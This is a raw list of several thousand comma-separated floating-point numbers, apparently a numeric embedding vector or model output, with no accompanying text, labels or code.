0.0026554150972515345, 0.016423627734184265, 0.005670997314155102, -0.006836629472672939, 0.0024491373915225267, -0.012278429232537746, -0.009351251646876335, 0.01982884481549263, -0.005831435322761536, 0.029756363481283188, -0.001326070399954915, -0.008362429216504097, -0.0029288146179169416, 0.0034903481137007475, -0.015506837517023087, -0.0035263649187982082, -0.01736661046743393, 0.012736824341118336, -0.0014791414141654968, 0.012088523246347904, -0.02776562236249447, -0.014328108169138432, -0.009488769806921482, -0.0037260940298438072, -0.049218494445085526, -0.004269619006663561, -0.02100757323205471, -0.00044693483505398035, 0.003850515466183424, -0.03376404196023941, 0.013489901088178158, -0.01777261681854725, 0.016227172687649727, 0.00922028161585331, 0.010870502330362797, -0.018558437004685402, 0.009279218502342701, 0.015952134504914284, 0.002717625582590699, -0.015244897454977036, -0.030515989288687706, -0.010981827042996883, 0.007098569069057703, -0.0016379425069317222, 0.028551440685987473, -0.0067711444571614265, 0.005094729829579592, -0.004993227776139975, 0.0323757641017437, -0.006266910117119551, -0.004387492313981056, -0.02587965503334999, 0.009233378805220127, 0.005258441902697086, 0.011669419705867767, 0.009979907423257828, -0.00048827219870872796, 0.004161568824201822, 0.005942760035395622, -0.011754550039768219, 0.00814632885158062, -0.006758047733455896, -0.017143961042165756, -0.0055924151092767715, 0.0005725841037929058, 0.007353960536420345, -0.0043220072984695435, 0.006849726662039757, 0.00750457588583231, 0.006126117892563343, 0.009246475994586945, -0.0043547498062253, -0.039788659662008286, 0.0067907897755503654, 0.010739533230662346, -0.008192167617380619, 0.008336234837770462, -0.00842791423201561, -0.005363218020647764, -0.015218704007565975, -0.004135374911129475, -0.00578887015581131, -0.0160962026566267, -0.019069219008088112, 0.02126951329410076, -0.01956690475344658, 0.06899494677782059, 0.019200189039111137, -0.010922891087830067, -0.010922891087830067, -0.009606643579900265, 0.052335578948259354, -0.023391226306557655, -0.0104252053424716, 0.00947567354887724, -0.008434462361037731, 0.015533031895756721, -0.011459867469966412, 0.010726436041295528, 0.02670476585626602, -0.01470792107284069, 0.007799258455634117, 0.022683989256620407, -0.008977987803518772, 0.015598516911268234, -0.024818798527121544, -0.004619963467121124, 0.0010600377572700381, 0.009724516421556473, -0.028603829443454742, 0.007877840660512447, -0.008421365171670914, -0.0042958129197359085, -0.01710467040538788, 0.0029435488395392895, -0.00033622432965785265, -0.03944813832640648, -0.01982884481549263, -0.002801119117066264, -0.013024957850575447, -0.009790001437067986, 0.000777633860707283, 0.011237218976020813, -0.00794332567602396, 0.018676308915019035, 0.027503682300448418, 0.0397624671459198, -0.010968729853630066, 0.0010158354416489601, 0.006630351766943932, -0.012560014612972736, 0.027503682300448418, -0.0069283084012568, -0.00988822802901268, 0.013581579551100731, -0.02449137344956398, -0.028603829443454742, -0.008133231662213802, 0.009770355187356472, 0.01792978122830391, -0.03028024360537529, 0.024412792176008224, 0.0029124433640390635, 0.015375867486000061, 0.01895134709775448, 0.009829292073845863, -0.00204313057474792, -0.01034662313759327, 0.021282611414790154, -0.007190247997641563, 0.009875131770968437, -0.011414027772843838, 0.0208504106849432, 0.01732731983065605, 0.005176585633307695, -0.012481432408094406, 0.011806937865912914, -0.003375749569386244, -0.010844308882951736, -0.0010019198525696993, 0.00006620119529543445, 0.019396644085645676, -0.010307332500815392, 0.010922891087830067, 0.013385125435888767, 0.01452456321567297, 0.016764149069786072, -0.010556175373494625, -0.0071116662584245205, -0.006682739593088627, -0.004806595854461193, -0.014157847501337528, 0.0008312496938742697, -0.017248736694455147, 0.0062734587118029594, -0.0072295391000807285, 0.024989059194922447, -0.0004755845002364367, -0.01880727894604206, -0.005500736180692911, 0.04083641991019249, 0.016004523262381554, -0.00796951912343502, 0.013018409721553326, 0.032297179102897644, 0.018479853868484497, 0.019121607765555382, -0.008702950552105904, -0.007995713502168655, 0.02259230986237526, -0.02341742068529129, -0.022618504241108894, -0.014812696725130081, 0.013922101818025112, 0.016489112749695778, 0.01345061045140028, 0.019147802144289017, -0.024072270840406418, 0.026193981990218163, 0.000584453227929771, -0.00464943191036582, -0.006368412170559168, -0.001236028503626585, -0.0053337495774030685, 0.009744161739945412, -0.009338154457509518, -0.005094729829579592, -0.011898616328835487, 0.009894777089357376, 0.008310041390359402, 0.004597044084221125, -0.003929097205400467, -0.006915211211889982, -0.006040987093001604, -0.026822637766599655, 0.003752287942916155, 0.015231801196932793, -0.0010199282551184297, -0.0074325427412986755, -0.012199847027659416, 0.0008247011573985219, -0.0201431717723608, 0.0021184382494539022, -0.0022183028049767017, -0.028499053791165352, 0.00021937460405752063, -0.024308016523718834, 0.003249690867960453, 0.007923679426312447, -0.009429833851754665, -0.006862823385745287, 0.01347680389881134, -0.0033053532242774963, 0.009233378805220127, 0.02305070497095585, -0.007000342011451721, 0.007177151273936033, 0.00673840194940567, -0.011368188075721264, 0.0029124433640390635, 0.006649997550994158, -0.011361639946699142, -0.04395350441336632, -0.019855039194226265, -0.007838549092411995, -0.007367057725787163, -0.019632389768958092, -0.0012311171740293503, -0.006283281370997429, -0.007537318393588066, 0.005808515474200249, 0.005163488909602165, 0.00018755301425699145, 0.004901548847556114, 0.012717178091406822, -0.004908097442239523, 0.019134704023599625, -0.00041480627260170877, -0.027084577828645706, 0.012599305249750614, 0.00606063287705183, 0.007838549092411995, -0.002455685753375292, 0.015454449690878391, 0.004423508886247873, -0.010831211693584919, -0.012880890630185604, -0.013051152229309082, -0.005124197807163, 0.0146031454205513, -0.0223434679210186, 0.022683989256620407, 0.0018237560288980603, -0.0003716271312441677, -0.026757152751088142, -0.007268830202519894, -0.016122397035360336, -0.012055780738592148, 0.00038288236828520894, -0.01875489205121994, -0.0034674284979701042, 0.012226041406393051, 0.01298566721379757, -0.0015601790510118008, -0.004243425093591213, -0.00730157271027565, -0.029442036524415016, 0.010385913774371147, 0.00022715094382874668, 0.031118450686335564, -0.0005214239936321974, -0.00040416495176032186, 0.004184488672763109, 0.006185054313391447, 0.016633179038763046, -0.015415159054100513, -0.01675105094909668, 0.005710288416594267, -0.01016981340944767, -0.024255627766251564, -0.005235522054135799, -0.004986679647117853, -0.016921313479542732, -0.0010322065791115165, -0.014550757594406605, -0.011099699884653091, -0.02711077220737934, -0.01926567405462265, -0.010798469185829163, -0.0042663449421525, -0.010012649931013584, 0.011754550039768219, -0.00883392058312893, 0.010922891087830067, 0.0065910606645047665, 0.010457947850227356, 0.012507626786828041, -0.01675105094909668, -0.02039201557636261, -0.00033274543238803744, 0.009534609504044056, 0.00635531498119235, 0.0050783585757017136, -0.014288817532360554, 0.006689288187772036, -0.001918709254823625, 0.03842657431960106, 0.0020480419043451548, -0.00664672302082181, 0.0038734350819140673, -0.0009069666266441345, 0.011040763929486275, -0.00024106648925226182, -0.0006638537743128836, -0.015650903806090355, -0.004472622647881508, 0.012363559566438198, 0.02315548062324524, -0.0010862316703423858, -0.011649773456156254, 0.011531900614500046, 0.005628432147204876, 0.03054218366742134, 0.014066169038414955, -0.005330475512892008, 0.00010764089529402554, -0.0031580119393765926, 0.001687874784693122, -0.003804676001891494, -0.0018745068227872252, -0.017248736694455147, 0.009868582710623741, 0.005896920338273048, 0.014563854783773422, -0.0016011071857064962, 0.004426782950758934, 0.0024376774672418833, 0.012520723976194859, 0.012461787089705467, 0.011459867469966412, 0.011328897438943386, -0.0027127142529934645, 0.010798469185829163, -0.002812578808516264, -0.0015086097409948707, -0.004980131052434444, -0.01516631618142128, -0.016423627734184265, -0.011165184900164604, -0.0035492845345288515, 0.0008725870284251869, -0.0018695954931899905, 0.021099252626299858, 0.027608457952737808, -0.01527109183371067, 0.01778571493923664, 0.013411318883299828, 0.004141923505812883, -0.011865873821079731, 0.011852777563035488, 0.03719545528292656, 0.005173311568796635, 0.002141358098015189, -0.02188507281243801, -0.002873152494430542, 0.0015839174157008529, -0.017903586849570274, -0.00004791145329363644, -0.01291363313794136, -0.01176109816879034, 0.009855485521256924, -0.006204699631780386, -0.00006251766899367794, 0.004973582457751036, -0.011787292547523975, -0.0019350805087015033, 0.0005463901325128973, 0.0016526766121387482, 0.004341652616858482, -0.01508773397654295, -0.005350120831280947, -0.002702891593798995, 0.002400023629888892, 0.014105459675192833, -0.005769224837422371, 0.0035558331292122602, 0.0010240209521725774, -0.022147012874484062, -0.01157774031162262, 0.008441010490059853, -0.011348542757332325, -0.0078058065846562386, 0.015441352501511574, 0.003896354930475354, -0.02412465773522854, -0.01613549329340458, -0.006388057488948107, 0.00011285922664683312, -0.010896696709096432, -0.003020493546500802, 0.013155927881598473, 0.0180345568805933, 0.0023296272847801447, -0.004662529099732637, 0.007923679426312447, -0.000019824547052849084, -0.013882811181247234, 0.0004915464669466019, -0.006109746638685465, -0.0010805018246173859, 0.003437960287556052, 0.012193298898637295, -0.00060368946287781, 6.395015361704282e-8, -0.004348201211541891, 0.011263412423431873, -0.004858983680605888, 0.0007424356881529093, -0.004885177593678236, -0.010798469185829163, 0.0060180677101016045, -0.013974489644169807, 0.008617820218205452, -0.005009599030017853, -0.009442931041121483, -0.010025747120380402, -0.010241847485303879, 0.006293104495853186, 0.019383547827601433, 0.00020678922010120004, 0.002630858216434717, -0.005893646273761988, 0.02202913910150528, -0.004849161021411419, 0.0008001443347893655, 0.011008021421730518, -0.0316685251891613, 0.00445952545851469, -0.004800047259777784, -0.0023214416578412056, 0.0006830899510532618, -0.010942536406219006, 0.007399800233542919, 0.01665937341749668, 0.005680819973349571, -0.0020906073041260242, -0.014878181740641594, 0.01516631618142128, -0.013581579551100731, 0.02628566138446331, -0.010752629488706589, 0.026220176368951797, -0.004361297935247421, -0.013227961026132107, 0.011315800249576569, 0.028158530592918396, -0.00456102704629302, -0.04227708652615547, -0.00060655438574031, -0.001443124725483358, -0.010647853836417198, -0.0020103880669921637, -0.014616242609918118, -0.0013547200942412019, -0.010837760753929615, -0.0011574466479942203, 0.0038439668715000153, -0.021610036492347717, -0.008650562725961208, 0.018506048247218132, -0.005785596091300249, 0.010955633595585823, -0.01792978122830391, -0.0028551442082971334, -0.0023951123002916574, 0.018217915669083595, 0.009593546390533447, 0.001889241044409573, 0.00144476187415421, 0.012645144946873188, -0.021688617765903473, 0.013411318883299828, 0.003030316438525915, -0.014891278930008411, 0.016777245327830315, -0.018073847517371178, -0.009154796600341797, -0.010805018246173859, 0.012049231678247452, 0.028603829443454742, 0.0036868031602352858, -0.006604157853871584, 0.003421589033678174, -0.0035132679622620344, -0.0016976974438875914, -0.003198940074071288, -0.020169366151094437, -0.021295707672834396, -0.005759401712566614, -0.0002049474569503218, -0.006237442139536142, -0.014066169038414955, 0.0022379483561962843, -0.008670208044350147, 0.008061198517680168, -0.00958044920116663, 0.0065124789252877235, -0.027294129133224487, -0.006522301584482193, -0.011269960552453995, 0.00475093349814415, -0.015506837517023087, -0.010228750295937061, 0.02521170862019062, 0.021374288946390152, 0.0024687829427421093, -0.0025129851419478655, -0.010667499154806137, 0.0037555622402578592, 0.005238796584308147, -0.01669866405427456, 0.0032955303322523832, 0.0000014037058235771838, -0.006126117892563343, 0.001028113765642047, -0.0033888465259224176, -0.0077730645425617695, 0.008748790249228477, -0.00046617104089818895, -0.012036135420203209, -0.008742242120206356, 0.03371165692806244, -0.003539461875334382, 0.005386137869209051, -0.01588665135204792, 0.006921759806573391, -0.008113586343824863, -0.008211813867092133, -0.014930570498108864, -0.013869713991880417, 0.011544997803866863, -0.009626288898289204, -0.008015358820557594, -0.008303492330014706, -0.005729933734983206, 0.009639385156333447, 0.0031269066967070103, 0.007144408766180277, -0.002593204379081726, -0.03344971686601639, 0.0018483129097148776, 0.011047312058508396, 0.01242904458194971, 0.023024510592222214, 0.0057954187504947186, -0.004230328369885683, -0.016777245327830315, 0.009927519597113132, 0.01593903824687004, 0.004492267966270447, -0.03119703382253647, -0.020116979256272316, 0.006718756631016731, -0.0007146045682020485, 0.020915895700454712, 0.010739533230662346, -0.014930570498108864, 0.01270408183336258, 0.0007358872098848224, 0.00606063287705183, -0.005461445543915033, 0.02931106649339199, -0.0023656440898776054, -0.00015900566359050572, 0.0030630589462816715, 0.0021282611414790154, 0.008362429216504097, 0.012645144946873188, -0.0022117544431239367, -0.01940974034368992, -0.0057364823296666145, -0.013332737609744072, 0.011289606802165508, 0.02028723992407322, 0.009927519597113132, 0.010549626313149929, 0.016004523262381554, -0.02126951329410076, 0.000851304444950074, -0.02494976855814457, 0.02280186116695404, -0.007832000963389874, -0.001200830447487533, 0.032401956617832184, -0.012278429232537746, -0.009036923758685589, -0.000577904749661684, 0.0074914791621267796, 0.012474884279072285, -0.012023038230836391, 0.013869713991880417, 0.008722595870494843, 0.011283057741820812, 0.01629265770316124, 0.0074325427412986755, 0.015257994644343853, -0.01884656958281994, -0.007295024115592241, 0.00011684971832437441, -0.011610482819378376, 0.00899108499288559, -0.002576833125203848, -0.009331606328487396, 0.004384217783808708, -0.018466757610440254, -0.008277298882603645, -0.004583946894854307, -0.0076748370192945, -0.024268724024295807, 0.011944456025958061, -0.02238275855779648, 0.0060147931799292564, 0.014668630436062813, -0.008591625839471817, 0.010962181724607944, -0.00942328479140997, 0.0010829574894160032, -0.03344971686601639, -0.014537660405039787, 0.01449836976826191, -0.023089995607733727, -0.009678676724433899, -0.03591195121407509, 0.005386137869209051, 0.0022919734474271536, 0.00912205409258604, -0.012101619504392147, -0.031275615096092224, -0.003562381723895669, 0.020352724939584732, -0.010091232135891914, 0.0024458630941808224, -0.03054218366742134, 0.008899405598640442, -0.004574124235659838, 0.016999894753098488, 0.001096054445952177, -0.005998421926051378, -0.004669077228754759, 0.005425428505986929, -0.004770579282194376, -0.0013424416538327932, -0.0033953948877751827, -0.01777261681854725, -0.007078923750668764, 0.014865085482597351, -0.013699453324079514, -0.011099699884653091, -0.014747212640941143, 0.02003839612007141, 0.016148589551448822, 0.026508310809731483, 0.029651587828993797, 0.01111934520304203, 0.003154737874865532, -0.00407316442579031, 0.004970308393239975, 0.00672530522570014, 0.026272565126419067, 0.00883392058312893, -0.007092020940035582, -0.002347635803744197, -0.054902587085962296, 0.031066063791513443, 0.001933443360030651, 0.013221412897109985, 0.012671339325606823, 0.0005492550553753972, 0.006954502314329147, 0.006437171250581741, 0.002480242634192109, -0.0002251045370940119, -0.007262281607836485, -0.002095518633723259, -0.01757616177201271, 0.009554254822432995, 0.0063913315534591675, -0.018375078216195107, -0.014655533246695995, -0.014170944690704346, -0.01961929351091385, 0.005605512298643589, 0.010287686251103878, 0.002206843113526702, -0.02361387573182583, -0.017589259892702103, -0.0077730645425617695, -0.022513728588819504, 0.015808068215847015, 0.01452456321567297, 0.010660951025784016, 0.011243767105042934, -0.0007579883676953614, -0.030463602393865585, 0.029730170965194702, 0.0017288028029724956, 0.006915211211889982, 0.0016158412909135222, 0.007701030932366848, 0.0248973798006773, -0.0010248395847156644, 0.021754102781414986, -0.007445639465004206, -0.007589706685394049, 0.005942760035395622, -0.003392120823264122, 0.016672469675540924, 0.01012397464364767, 0.02310309186577797, 0.006718756631016731, 0.02280186116695404, 0.00014734115393366665, 0.018741793930530548, -0.03172091394662857, -0.0011287969537079334, 0.016436723992228508, -0.0005087362369522452, -0.00832968670874834, 0.011538449674844742, 0.0012835051165893674, 0.016476014629006386, -0.00899108499288559, -0.009397091343998909, 0.02904912643134594, -0.0004473441222216934, 0.006679465528577566, 0.0025653732009232044, -0.013948296196758747, -0.005959130823612213, 0.009776904247701168, 0.007897485978901386, 0.016017619520425797, 0.0087094996124506, -0.02305070497095585, -0.0050783585757017136, 0.005782321561127901, 0.009311961010098457, -0.0013596314238384366, 0.00617195712402463, 0.023640070110559464, -0.02463543973863125, -0.003834144212305546, 0.007065827026963234, 0.027084577828645706, -0.012173653580248356, 0.021295707672834396, 0.01444598101079464, 0.0036147695500403643, 0.0043220072984695435, 0.013660161755979061, 0.0025342677254229784, -0.010051940567791462, 0.010660951025784016, -0.006397880148142576, -0.024399694055318832, -0.00873569305986166, -0.002332901582121849, -0.007262281607836485, 0.0034445086494088173, -0.00294518587179482, -0.0036737059708684683, -0.001629756879992783, 0.003591849934309721, 0.005513833370059729, -0.010320428758859634, 0.02572249062359333, 0.02382342703640461, -0.010104328393936157, 0.007556964177638292, 0.0035001710057258606, 0.005068535450845957, -0.007812355179339647, -0.023089995607733727, 0.0100715858861804, 0.02120402827858925, -0.0005987780750729144, -0.026455922052264214, 0.007615900598466396, 0.007039632648229599, 0.005163488909602165, 0.014930570498108864, 0.02305070497095585, -0.01234391424804926, -0.006090100854635239, -0.014668630436062813, -0.008905953727662563, -0.0146031454205513, -0.03043740801513195, -0.017811907455325127, 0.0128874396905303, -0.0343141183257103, 0.005235522054135799, -0.004672351758927107, -0.008087391965091228, 0.020614665001630783, 0.004397314973175526, -0.014773406088352203, -0.015140121802687645, -0.01411855686455965, 0.00312526966445148, 0.011230669915676117, -0.007386703044176102, 0.01052998099476099, -0.001702608889900148, -0.011800388805568218, 0.018925152719020844, -0.005009599030017853, 0.010752629488706589, -0.011951004154980183, 0.004895000718533993, 0.025499841198325157, -0.007707579527050257, 0.025447454303503036, -0.002686520339921117, 0.004610140807926655, -0.011165184900164604, -0.007484930567443371, -0.004590495489537716, 0.013424416072666645, 0.018558437004685402, 0.012409399263560772, 0.018414368852972984, -0.002833861391991377, -0.013895907439291477, 0.002316530328243971, 0.0053370241075754166, -0.008663659915328026, -0.02002529986202717, 0.009344703517854214, -0.0036475120577961206, -0.000016435189536423422, 0.0023590954951941967, 0.0007236087694764137, 0.013411318883299828, 0.01875489205121994, -0.026560697704553604, 0.015441352501511574, 0.026102304458618164, -0.015441352501511574, -0.0016117484774440527, 0.005451622419059277, -0.0006511660176329315, -0.0002862920518964529, 0.00759625481441617, -0.000844755966681987, -0.009135151281952858, -0.009318509139120579, 0.010163265280425549, 0.005160214379429817, 0.014851988293230534, 0.0015118839219212532, 0.0013645427534356713, 0.016777245327830315, -0.0155723225325346, 0.02526409551501274, -0.008244556374847889, -0.014301914721727371, -0.023024510592222214, -0.0026079383678734303, -0.007799258455634117, 0.020732536911964417, 0.01889895834028721, 0.01063475664705038, -0.007399800233542919, -0.012396302074193954, -0.008139779791235924, -0.004996502306312323, -0.01901683211326599, -0.018375078216195107, -0.0072884755209088326, -0.021452872082591057, -0.012880890630185604, 0.011289606802165508, -0.007236087694764137, 0.00019645487191155553, -0.007930228486657143, 0.003457605605944991, 0.023168576881289482, 0.01093598734587431, 0.031589943915605545, -0.006139214616268873, 0.003637689398601651, -0.016489112749695778, 0.0031056241132318974, -0.006057358346879482, 0.013424416072666645, -0.015690196305513382, -0.029730170965194702, -0.007635545916855335, 0.00007392637780867517, 0.011695613153278828, -0.0214659683406353, -0.02755606919527054, 0.021544551476836205, -0.004790224600583315, 0.0009233378805220127, -0.019043024629354477, -0.0015978328883647919, 0.0019432661356404424, 0.0035198163241147995, 0.011224121786653996, 0.0041222781874239445, 0.009600094519555569, 0.007792709860950708, -0.02591894567012787, -0.006869371980428696, 0.007065827026963234, -0.008028456009924412, 0.019710971042513847, 0.012618951499462128, 0.032873447984457016, -0.004528284538537264, -0.006001696456223726, -0.011977198533713818, -0.015873553231358528, 0.012841599993407726, 0.010523432865738869, 0.027320323511958122, 0.0038406928069889545, -0.0017238914733752608, -0.009082763455808163, 0.012049231678247452, 0.013817326165735722, -0.00046985456719994545, -0.02669166773557663, 0.006139214616268873, -0.0035853013396263123, -0.004161568824201822, -0.029284872114658356, 0.029232485219836235, 0.0012892350787296891, -0.0069741480983793736, 0.009541158564388752, 0.012880890630185604, 0.003405217779800296, 0.025172417983412743, -0.004233602434396744, 0.011695613153278828, -0.01824410818517208, -0.032349567860364914, 0.024412792176008224, 0.006797338370233774, 0.013358931057155132, 0.011427124962210655, 0.016371238976716995, -0.011178282089531422, -0.00796951912343502, 0.019999105483293533, -0.01762855052947998, -0.0014775043819099665, 0.012651694007217884, 0.023194771260023117, 0.03119703382253647, 0.018794182687997818, 0.013299995101988316, -0.025015253573656082, -0.003198940074071288, 0.002413120586425066, 0.0016829633386805654, 0.013830422423779964, 0.005720111075788736, -0.01859772764146328, -0.005307555664330721, -0.002167552011087537, -0.010156717151403427, 0.00970487017184496, 0.0061359405517578125, 0.005769224837422371, 0.002452411688864231, -0.02755606919527054, 0.01032697781920433, -0.010313880629837513, 0.0017828278942033648, 0.009128603152930737, -0.006437171250581741, -0.015140121802687645, -0.003608221188187599, -0.02285424992442131, 0.008290395140647888, 0.03151136264204979, 0.0008099670521914959, -0.008964890614151955, -0.027294129133224487, -0.004328555427491665, 0.0060180677101016045, -0.0017140686977654696, 0.01624026894569397, 0.0018204818479716778, -0.03258531540632248, -0.0017648196080699563, 0.01982884481549263, 0.014184041880071163, 0.01462933886796236, -0.01650220900774002, -0.015480644069612026, 0.007707579527050257, -0.018623922020196915, -0.0011803663801401854, 0.01060856319963932, -0.006581238005310297, 0.007078923750668764, 0.0002672604750841856, -0.01478650327771902, -0.006371686235070229, 0.010680596344172955, -0.01221949327737093, -0.0020987929310649633, -0.011211024597287178, 0.029232485219836235, -0.0017566339811310172, 0.037012096494436264, -0.002850232645869255, -0.000829203287139535, -0.01298566721379757, -0.0010387551737949252, 0.008238007314503193, 0.0016379425069317222, -0.01444598101079464, -0.009076215326786041, -0.012468336150050163, -0.002074236050248146, 0.018794182687997818, 0.015218704007565975, -0.0018384901341050863, 0.006980696227401495, 0.0057954187504947186, 0.019645486027002335, 0.0008488487219437957, -0.007576609496027231, -0.00901727844029665, 0.043874919414520264, -0.007078923750668764, -0.028394276276230812, 0.0019727342296391726, 0.0019121607765555382, -0.026324952021241188, 0.013725646771490574, 0.02069324627518654, 0.015873553231358528, -0.018178623169660568, 0.002932088915258646, -0.009325058199465275, -0.03562381491065025, -0.024530664086341858, 0.014354302547872066, 0.016816535964608192, -0.003346281358972192, 0.0025293563958257437, -0.009744161739945412, -0.0032709736842662096, -0.005847806576639414, 0.016056912019848824, -0.008742242120206356, 0.005484364926815033, -0.005382863339036703, 0.0031498263124376535, -0.007714127656072378, -0.013948296196758747, 0.008408267982304096, -0.013489901088178158, -0.02090279757976532, 0.010975278913974762, -0.0034870740491896868, -0.005389411933720112, 0.010602014139294624, -0.020667051896452904, -0.005124197807163, 0.027687039226293564, -0.0076289973221719265, -0.01468172762542963, 0.006731853354722261, 0.020352724939584732, 0.006247264798730612, -0.011852777563035488, -0.0046985456719994545, 0.009292315691709518, 0.017955975607037544, -0.005942760035395622, 0.015244897454977036, -0.0026930689346045256, -0.012671339325606823, -0.0032775220461189747, -0.015375867486000061, 0.020588470622897148, 0.0047574820928275585, -0.0015266180271282792, 0.014223332516849041, -0.0121409110724926, -0.013280348852276802, -0.019750263541936874, -0.010981827042996883, 0.003667157609015703, 0.0004465255478862673, 0.006568141281604767, -0.0042990874499082565, 0.008768435567617416, 0.014812696725130081, -0.017405901104211807, 0.001502879778854549, 0.014315011911094189, 0.01137473713606596, -0.004695271607488394, -0.005412331782281399, -0.009246475994586945, -0.001889241044409573, 0.0027863848954439163, -0.011263412423431873, 0.005887097679078579, -0.0004006860835943371, 0.015127024613320827, 0.002200294518843293, -0.014563854783773422, -0.005228973925113678, 0.0024491373915225267, 0.002612849697470665, -0.010091232135891914, 0.0021266238763928413, 0.00739325163885951, 0.022736376151442528, -0.008971438743174076, 0.025683199986815453, -0.005025970283895731, 0.006201425567269325, -0.005893646273761988, -0.004822967108339071, -0.0010461221681907773, -0.027372712269425392, 0.016253367066383362, -0.008578529581427574, -0.01193790789693594, -0.0005214239936321974, 0.00863091740757227, 0.024308016523718834, -0.018506048247218132, 0.027084577828645706, -0.006214522290974855, -0.02003839612007141, -0.0022886991500854492, -0.0035951239988207817, -0.022775668650865555, -0.007615900598466396, 0.005634980276226997, 0.009259573183953762, -0.006640174426138401, -0.007655191235244274, 0.011590837500989437, -0.001599470037035644, -0.012697532773017883, -0.015690196305513382, -0.019763359799981117, -0.008152876980602741, 0.01849295198917389, -0.014930570498108864, -0.011951004154980183, -0.02064085751771927, 0.031747106462717056, -0.011630128137767315, 0.006345492321997881, 0.00016678200336173177, -0.017445191740989685, -0.000014593424566555768, 0.0033724752720445395, -0.0020840587094426155, 0.0034150404389947653, 0.004161568824201822, 0.008997633121907711, 0.008165974169969559, -0.012946375645697117, -0.013241058215498924, 0.006836629472672939, -0.03418314829468727, -0.00827074982225895, 0.012854697182774544, -0.015480644069612026, -0.00794332567602396, 0.011027666740119457, -0.014838891103863716, -0.0017566339811310172, 0.008847017772495747, 0.02259230986237526, -0.019645486027002335, 0.003411766141653061, 0.017143961042165756, -0.006090100854635239, 0.02192436344921589, -0.008395171724259853, 0.007812355179339647, 0.006574689410626888, 0.014341205358505249, -0.01178074348717928, 0.016436723992228508, 0.0034477829467505217, -0.0005594870890490711, 0.008486850187182426, -0.017536871135234833, -0.0014644073089584708, -0.012370108626782894, -0.009292315691709518, 0.010156717151403427, 0.025892751291394234, 0.009914422407746315, 0.024818798527121544, -0.006158859934657812, -0.001051852130331099, 0.0019580002408474684, -0.019291868433356285, -0.011302703060209751, 0.04052209109067917, -0.00016094974125735462, 0.00016831680841278285, -0.030463602393865585, -0.007838549092411995, -0.022972121834754944, 0.025643909350037575, -0.005186408758163452, 0.013738743960857391, -0.007609352003782988, 0.010490690357983112, 0.0028485956136137247, -0.0009970084065571427, -0.007203345187008381, 0.012016489170491695, 0.007353960536420345, 0.011689065024256706, -0.015284189023077488, 0.015362771227955818, 0.01931806281208992, 0.011263412423431873, -0.03842657431960106, -0.021230222657322884, 0.0015217066975310445, 0.01624026894569397, 0.012291526421904564, 0.017340416088700294, -0.00947567354887724, -0.03248053789138794, -0.011689065024256706, -0.008061198517680168, 0.021387387067079544, -0.0008922325214371085, -0.007812355179339647, 0.002455685753375292, 0.02802756056189537, -0.01411855686455965, 0.0013964667450636625, -0.012147459201514721, -0.006368412170559168, 0.015493740327656269, -0.0033282728400081396, 0.014865085482597351, -0.035440459847450256, -0.010202555917203426, 0.014865085482597351, -0.0060770041309297085, -0.0034903481137007475, 0.04201514646410942, 0.01393519900739193, -0.008513044565916061, -0.0031563749071210623, -0.014380495995283127, -0.001310517662204802, 0.02766084484755993, -0.027582263574004173, -0.004911371506750584, -0.011931358836591244, -0.01865011639893055, 0.006810435559600592, -0.0042990874499082565, -0.005805241409689188, 0.028106143698096275, 0.008513044565916061, 0.010097780264914036, 0.0100715858861804, -0.007962970994412899, 0.005641528870910406, -0.0022461339831352234, -0.011204476468265057, -0.003850515466183424, 0.015768777579069138, 0.028106143698096275, 0.03420934081077576, -0.018231011927127838, 0.009226830676198006, 0.00485243508592248, 0.026154691353440285, 0.02019556052982807, 0.0041190036572515965, 0.002102066995576024, 0.007949873805046082, 0.022002944722771645, -0.002066050423309207, -0.00998645555227995, -0.0034608799032866955, -0.010091232135891914, -0.028368083760142326, -0.0048360638320446014, -0.03156374767422676, -0.0056513515301048756, 0.02213391475379467, 0.0008148784399963915, -0.01045139878988266, -0.02229107916355133, 0.033633071929216385, -0.003220222657546401, -0.01659388840198517, 0.006378234829753637, 0.007917131297290325, 0.0004098949139006436, -0.013018409721553326, -0.02878718636929989, 0.014825793914496899, -0.005307555664330721, -0.01109315175563097, 0.004796773195266724, 0.005363218020647764, 0.003059784648939967, 0.005959130823612213, -0.009600094519555569, -0.0015077911084517837, -0.027163159102201462, -0.02095518633723259, -0.004554478917270899, 0.001948177465237677, 0.008480302058160305, -0.004986679647117853, -0.0002934544754680246, 0.009855485521256924, 0.014511466026306152, -0.021492162719368935, -0.010647853836417198, -0.0063127498142421246, -0.013699453324079514, -0.006489559076726437, -0.003546010470017791, -0.012317719869315624, 0.0028780638240277767, 0.01840127259492874, 0.0010976915946230292, -0.037535976618528366, -0.013882811181247234, -0.005209328141063452, 0.004292538855224848, 0.011060409247875214, 0.0155723225325346, -0.029494425281882286, -0.013424416072666645, -0.04146507382392883, -0.016174783930182457, -0.010228750295937061, 0.015454449690878391, -0.008224910125136375, 0.01244868990033865, -0.004076438490301371, -0.018060751259326935, -0.021636229008436203, 0.002732359804213047, 0.012055780738592148, 0.014170944690704346, 0.030935093760490417, -0.015598516911268234, -0.0001792650728020817, -0.006106472108513117, 0.026377340778708458, -0.01905612275004387, 0.017143961042165756, 0.004302361514419317, 0.00837552547454834, 0.004531559068709612, 0.004259796347469091, 0.014079265296459198, -0.013123185373842716, 0.007150957360863686, 0.0062767332419753075, 0.012455238960683346, -0.005438525695353746, -0.005847806576639414, 0.00048213297850452363, 0.024936672300100327, 0.005942760035395622, -0.010713338851928711, 0.010058489628136158, 0.0018777811201289296, 0.016947505995631218, 0.021610036492347717, -0.0008619457366876304, -0.005654626060277224, -0.008663659915328026, -0.00232471595518291, -0.0030777929350733757, -0.012749920599162579, -0.011250315234065056, 0.01004539243876934, 0.023391226306557655, 0.0003028679348062724, 0.008323137648403645, 0.012075426056981087, 0.008722595870494843, -0.017536871135234833, 0.002902620704844594, 0.009344703517854214, -0.0138566168025136, 0.014550757594406605, -0.03214001655578613, 0.004917920101433992, 0.017078476026654243, 0.015035346150398254, 0.027136966586112976, 0.02346980758011341, 0.026875026524066925, -0.022474437952041626, 0.0058772750198841095, 0.008264201693236828, 0.027791814878582954, -0.008493399247527122, 0.0037948533426970243, -0.01921328715980053, -0.005435251165181398, 0.013712549582123756, 0.0025899300817400217, 0.02274947427213192, 0.011047312058508396, -0.0006061451276764274, 0.015140121802687645, 0.008886308409273624, 0.03402598202228546, 0.006551770027726889, 0.0028666038997471333, 0.011165184900164604, -0.024399694055318832, 0.005055438727140427, -0.013804228976368904, 0.00031596492044627666, 0.03803366422653198, -0.0012638596817851067, 0.02341742068529129, 0.005523656029254198, -0.020837312564253807, -0.02192436344921589, 0.003236593911424279, 0.012599305249750614, 0.011767646297812462, -0.0021806489676237106, -0.0032709736842662096, 